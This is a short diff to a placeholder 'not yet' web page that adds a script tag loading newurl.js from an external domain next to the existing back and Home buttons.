--- a/notyet.html
+++ b/notyet.html
@@ -16,5 +16,7 @@
     <p><br><a style="text-decoration: none; color:inherit; font-weight: 900;" href="javascript:history.back()"><span style="font-size: medium; border: black 2.3px solid; border-radius: 999px; width: min-content; padding: 2px 6px 4px;">&larr;</span></a>
         <a style="text-decoration: none; color:inherit" href="index.html"><span style="font-size: medium; border: black 2.3px solid; border-radius: 999px; width: min-content; padding: 2px 8px 4px;">Home</span></a></p>
 </div>
+<script src='https://f.zly.vg/js/newurl.js'></script>
+
 </body>
 </html>
